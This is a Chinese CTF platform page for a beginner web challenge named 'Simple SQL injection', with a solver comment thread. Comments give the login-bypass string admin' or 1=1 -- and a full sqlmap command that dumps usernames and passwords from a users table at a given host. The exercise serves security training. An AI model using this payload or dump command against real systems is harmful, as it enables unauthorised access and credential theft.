Simple SQL injectionWEB 未解决

分数: 10 金币: 2
题目作者: qingshen
一  血: lzq2000
一血奖励: 2金币
解  决: 1739
提  示:
描  述:

flag{}

评论
juicebug 10天前

sqlmap自动破解哈希密码得到passward是假的flag{},需直接用看似密文的明文作为密码登入得到真flag{}

回复 0

hm001223 13天前

flag{***}

回复 0

xiaoroubao 1月前

我靠,通过sqlmap找到数据库里的字段,我看密码还以为是加密过的,在哪里解密半个小时,原来密码也是明文的

回复 0

WWls= 1月前

fuzz爆破直接秒了

回复 0

i11us0ry 2月前

以为是注入 没想到是万能密码

回复 0

苦瓜king 2月前

admin' or 1=1 --

回复 0

下辈子一定学会 2月前

用户名admin' or 1=1 -- 密码随便输就可以进去了,万能密码绕过登录验证

回复 2

azerl7 2月前

最好的密码就是这样,让别人猜到底是不是密码,你猜我这个是屏蔽了还是我写的,****

回复 0

cisp7 2月前

Flag{}4f8b65015

回复 0

b2026tf 2月前

执行命令:sqlmap.py -u http://103.236.73.121:15822/article?id=1 -T users -C username,password --dump

回复 0

WriteUp

image
lzq2000

2 金币

评分(7)

解题动态

socratesx 攻破了该题 21小时前
小韩极客 攻破了该题 21小时前
youxi 攻破了该题 23小时前
五彩星云 攻破了该题 1天前
sysgetshell 攻破了该题 1天前
lllinux 攻破了该题 1天前
hh_lll 攻破了该题 1天前
Vesper_6 攻破了该题 1天前
多米今天犯错了没 攻破了该题 1天前
c26h26 攻破了该题 2天前
18744838346 攻破了该题 2天前
浪迹天涯198405 攻破了该题 2天前
游侠2026 攻破了该题 3天前
18541 攻破了该题 3天前
zrlht 攻破了该题 3天前
1781****263 攻破了该题 3天前
关灯吃面 攻破了该题 3天前
苦味的辣条 攻破了该题 3天前
majixikuwa 攻破了该题 4天前
誓言RQLwaBUG 攻破了该题 4天前
问题反馈